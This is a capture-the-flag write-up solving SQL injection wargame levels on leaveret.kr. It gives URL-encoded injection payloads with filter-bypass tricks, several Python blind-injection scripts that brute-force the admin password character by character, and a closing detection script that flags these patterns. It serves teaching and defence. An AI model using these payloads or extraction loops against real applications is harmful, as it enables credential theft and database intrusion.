http://leaveret.kr/los/gate.php
A site apparently made by reworking rubiya.kr(?)... Since I already wrote up the rubiya.kr solutions earlier, I am not writing separate solutions here. They are similar.
gremlin
?id=admin%27%23
cobolt
?id=admin%27%23
goblin
?no=-1%20union%20select%20char(97,100,109,105,110)%23
orc
# -*- encoding: cp949 -*-
import urllib2

answer = ''
for i in range(1, 9):            # password positions 1..8
    for j in range(32, 128):     # printable ASCII candidates
        print i, j, answer
        req = urllib2.Request('http://leaveret.kr:8080/los/orc_60e5b360f95c1f9688e4f3a86c5dd494.php?pw=%27%20or%20id=%27admin%27%20and%20ascii(substr(pw,' + str(i) + ',1))=' + str(j) + '%23')
        req.add_header('cookie', 'PHPSESSID=k0kefn94gf5skn8ral8gmofkv0')
        page = urllib2.urlopen(req).read()
        if page.find('<h2>Hello admin</h2>') != -1:   # true branch: this position is chr(j)
            answer += chr(j)
            break
print answer
wolfman
?pw=%27%0aor%0aid=%27admin%27%23
darkelf
?pw=%27||id=%27admin%27%23
orge
# -*- encoding: cp949 -*-
import urllib2

answer = ''
for i in range(1, 9):            # password positions 1..8
    for j in range(32, 128):     # printable ASCII candidates
        print i, j, answer
        req = urllib2.Request('http://leaveret.kr:8080/los/orge_bad2f25db233a7542be75844e314e9f3.php?pw=%27||id=%27admin%27%26%26ascii(substr(pw,' + str(i) + ',1))=' + str(j) + '%23')
        req.add_header('cookie', 'PHPSESSID=k0kefn94gf5skn8ral8gmofkv0')
        page = urllib2.urlopen(req).read()
        if page.find('<h2>Hello admin</h2>') != -1:   # true branch: this position is chr(j)
            answer += chr(j)
            break
print answer
troll
?id=Admin
vampire
?id=adadminmin
skeleton
?pw=%27%20or%20id=%27admin%27%23
golem
# -*- encoding: cp949 -*-
import urllib2

answer = ''
for i in range(1, 9):            # password positions 1..8
    for j in range(32, 128):     # printable ASCII candidates
        print i, j, answer
        req = urllib2.Request('http://leaveret.kr:8080/los/golem_4b5202cfedd8160e73124b5234235ef5.php?pw=%27||id%20like%20%27admin%27%26%26ascii(right(left(pw,' + str(i) + '),1))%20like%20' + str(j) + '%23')
        req.add_header('cookie', 'PHPSESSID=k0kefn94gf5skn8ral8gmofkv0')
        page = urllib2.urlopen(req).read()
        if page.find('<h2>Hello admin</h2>') != -1:   # true branch: this position is chr(j)
            answer += chr(j)
            break
print answer
darkknight
# -*- encoding: cp949 -*-
import urllib2

answer = ''
for i in range(1, 9):            # password positions 1..8
    for j in range(32, 128):     # printable ASCII candidates
        print i, j, answer
        req = urllib2.Request('http://leaveret.kr:8080/los/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php?no=1%20or%20id%20like%20char(97,100,109,105,110)%20and%20ord(right(left(pw,' + str(i) + '),1))%20like%20' + str(j) + '%23')
        req.add_header('cookie', 'PHPSESSID=k0kefn94gf5skn8ral8gmofkv0')
        page = urllib2.urlopen(req).read()
        if page.find('<h2>Hello admin</h2>') != -1:   # true branch: this position is chr(j)
            answer += chr(j)
            break
print answer
bugbear
# -*- encoding: cp949 -*-
import urllib2

answer = ''
for i in range(1, 9):            # password positions 1..8
    for j in range(32, 128):     # printable ASCII candidates
        print i, j, answer
        req = urllib2.Request('http://leaveret.kr:8080/los/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php?no=0%0a||%0aid%0aregexp%0achar(97,100,109,105,110)%26%26hex(right(left(pw,' + str(i) + '),1))%0aregexp%0ahex(' + str(j) + ')%23')
        req.add_header('cookie', 'PHPSESSID=k0kefn94gf5skn8ral8gmofkv0')
        page = urllib2.urlopen(req).read()
        if page.find('<h2>Hello admin</h2>') != -1:   # true branch: this position is chr(j)
            answer += chr(j)
            break
print answer
giant
?shit=%0c
assassin
This one needs a bit of explanation; it is a problem about LIKE. Since ' cannot be used, if we assume admin's password is adf, then a pattern like %a% makes admin appear. But even after trying every value from 32 to 127, only Hello guest came out. There is exactly one case in which that happens: admin's and guest's passwords are made up of the same characters in a different order, and guest sits above admin in the DB. So if admin's pw is adf and guest's is dfa, searching for %d% returns guest (because it is higher up). Still, there must be some difference between admin and guest, so you try matching several characters at once. To get admin in a case like the one above, you enter something like %adf%. The initial value of answer below is every character for which guest came out, and the code brute-forces combinations of them until admin appears.
# -*- encoding: cp949 -*-
import urllib2

# every character for which the LIKE probe returned "Hello guest"
answer = '# % & 0 1 2 9 D E F _ d e f'.split()
for k in answer:
    for i in answer:
        for j in answer:
            print k, i, j
            req = urllib2.Request('http://leaveret.kr:8080/los/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=%' + k + i + j + '%')
            req.add_header('cookie', 'PHPSESSID=k0kefn94gf5skn8ral8gmofkv0')
            page = urllib2.urlopen(req).read()
            if page.find('<h2>Hello admin</h2>') != -1:   # three-character combination matched admin
                print 'end!'
                exit(0)
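The levels above get past keyword filters by substituting newlines for spaces, || and && for or/and, and char() for quoted strings. As an added defender-side example (not part of this writeup or the challenge site), the following Python 3 script normalizes request query strings to undo those substitutions and then flags the blind-injection shapes used in this post; the sample query strings are constructed from the payloads shown above, plus one benign login for contrast.

```python
import re
from urllib.parse import unquote

# Constructed sample query strings, modelled on the payloads in this writeup,
# plus one benign login for contrast.
SAMPLE_QUERIES = [
    "id=admin%27%23",
    "no=-1%20union%20select%20char(97,100,109,105,110)%23",
    "pw=%27%0aor%0aid=%27admin%27%23",
    "pw=%27||id=%27admin%27%23",
    "pw=%27||id%20like%20%27admin%27%26%26ascii(right(left(pw,3),1))%20like%2097%23",
    "no=0%0a||%0aid%0aregexp%0achar(97,100,109,105,110)%26%26hex(right(left(pw,1),1))%0aregexp%0ahex(97)%23",
    "pw=%25adf%25",
    "id=guest&pw=hunter2",
]

def normalize(query):
    """Undo the filter-evasion tricks seen above so one rule set can match them all."""
    s = unquote(query).lower()
    s = re.sub(r"\s+", " ", s)                          # %0a / %0c / tab stand in for spaces
    s = s.replace("||", " or ").replace("&&", " and ")  # symbolic forms of the filtered keywords
    s = re.sub(r"char\(([\d,\s]+)\)",                   # rebuild quote-less string literals
               lambda m: "'" + "".join(chr(int(c)) for c in m.group(1).split(",")) + "'", s)
    return s

INDICATORS = [
    ("comment-terminated quote", re.compile(r"'[^']*#")),
    ("boolean tautology", re.compile(r"\b(or|and)\s+id\s*(=|like|regexp)\s*'")),
    ("union select", re.compile(r"\bunion\s+select\b")),
    ("char-by-char extraction", re.compile(r"\b(ascii|ord|hex)\s*\(\s*(substr|right|left)\b")),
    ("wildcard-only password", re.compile(r"\bpw=%[^&]*%(&|$)")),
]

def flag_query(query):
    """Return the names of every indicator that matches one query string."""
    s = normalize(query)
    return [name for name, rx in INDICATORS if rx.search(s)]

def scan(queries):
    """Map each query string to its indicator hits; an empty list means no finding."""
    return {q: flag_query(q) for q in queries}

if __name__ == "__main__":
    for q, hits in scan(SAMPLE_QUERIES).items():
        print("ALERT" if hits else "ok   ", q, hits)
```

Run against real access logs, the same normalization step is what keeps a single rule from being defeated by the whitespace and operator substitutions each level required.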